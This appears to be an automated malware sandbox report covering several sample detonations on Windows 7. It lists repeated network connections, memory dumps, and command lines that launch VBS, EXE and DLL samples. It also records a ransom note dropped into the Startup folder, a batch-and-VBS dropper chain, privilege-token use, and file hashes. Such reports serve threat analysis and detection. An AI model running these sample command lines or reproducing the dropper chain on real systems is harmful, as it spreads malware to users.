HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp

Files

memory/2428-3-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-4-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-5-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-6-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-7-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-8-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-9-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-10-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-11-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-12-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-13-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-14-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-15-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-16-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-17-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-18-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-19-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-20-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-21-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-22-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-23-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-24-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-25-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-26-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-27-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-28-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-29-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-30-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-31-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-32-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-33-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-34-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-35-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-36-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-37-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-38-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-39-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-40-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-41-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-42-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-43-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-44-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-45-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-46-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-47-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-48-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-49-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-50-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-51-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-52-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-53-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-54-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-55-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-56-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-57-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-58-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-59-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-60-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-61-0x0000000000400000-0x00000000004A0000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:16

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e37dc428ec65a38707ad9e247950f3501a94e4abccb737a3562d69032c8505ad.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e37dc428ec65a38707ad9e247950f3501a94e4abccb737a3562d69032c8505ad.vbs"

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:27

Platform

win7-20240903-en

Max time kernel

357s

Max time network

358s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe"

Signatures

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\READ_THIS_TO_DECRYPT.html C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe

"C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe"

Network

N/A

Files

C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html

MD5 55764b80badcdfe4337f538993fc3aab
SHA1 049ebb79ca8e78a30318d9eef6b37992572e1034
SHA256 a53779746a2aec49c361f546b70a74508aac83c9ea8203af07f142abfa251b35
SHA512 b8a94d01ad1ca07fd08a890a5b55b71d97d0fc3df705704812c18993872d1ed7360aea6a5fb7e388fd8cedbc2baa7cfabf4207f59becee2927aa1030fa60689b

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:30

Platform

win7-20241010-en

Max time kernel

313s

Max time network

319s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\fb8823e9494016f59ab25ec6cc0961da_api-ms-win-system-softpub-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\fb8823e9494016f59ab25ec6cc0961da_api-ms-win-system-softpub-l1-1-0.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

600s

Max time network

363s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe

"C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B838.tmp\ExtraTools.bat "C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe""

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B838.tmp\ErOne.vbs"

C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe

chrst.exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\B838.tmp\ExtraTools.bat

MD5 8f07fa594d84c6e234b336def0b47cdc
SHA1 34b88980635c3f2367af03caedc01d50b5e4624a
SHA256 dd79d7a80a9087e1fced76ade08394843eab01a8ce263dc2306f46435b451f77
SHA512 c33fd26b5399771f4bf9877d717bb730a8101b9f6bd24847084c50b066db7f6e43d56cbf44792eedc94d117c50a988f5d4a46127a34a2115c50fbb4a67ed2047

C:\Users\Admin\AppData\Local\Temp\B838.tmp\ErOne.vbs

MD5 a764fe63c6cc48c851f0d2a8ba73c2b7
SHA1 e16351bd38ebcac7e182905767f9b36e078fb5d5
SHA256 8c4d90a5343cea107fad96e842404522aadfc416e7cf84adc58fe2ba72bbc919
SHA512 b0a93898c66c2ff97f9d8cb1f75364a6c4a0ad5cf3158815f94ffb900796065c8e0d384b392d59bf2b01419adb8c65d2dc846ddebaaea971d64c3300edc63571

C:\Users\Admin\AppData\Local\Temp\B838.tmp\firefox32.exe

MD5 866604f3adb9207e29505012215f203f
SHA1 718b342c3bc42f3e73c4014c2b105c4d467b0ba6
SHA256 978ed9b9c86653e8f10feb9e7f93eb32f2dadeec42ccce498403e96b7bb3e3c9
SHA512 cdcdd94e2a4c550a819a28085fe543ed944da298da1409ed111380fbde89f6976a4c7d040750307579b007b4551aa86182d453408436bd7aef35423c49b60f79

C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe

MD5 c657daf595b5d535ccc757ad837eebe8
SHA1 894e953e86e54a830a14fac94e57569d184a9c09
SHA256 a02565ec78fa1221433e720bd57b044938345b8c65a73143bd9ff73529767526
SHA512 21a26bc146dd2a915c17b268b13edc565e9a582d11c1714d89741f4156a880dfe35415d4920a6326d164519f4b28b6371ef9c7bfdb5e19080448bd77b4a20a4b

memory/2640-44-0x000000007428E000-0x000000007428F000-memory.dmp

memory/2640-45-0x0000000000140000-0x0000000000168000-memory.dmp

memory/2640-46-0x000000007428E000-0x000000007428F000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240708-en

Max time kernel

377s

Max time network

377s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe"

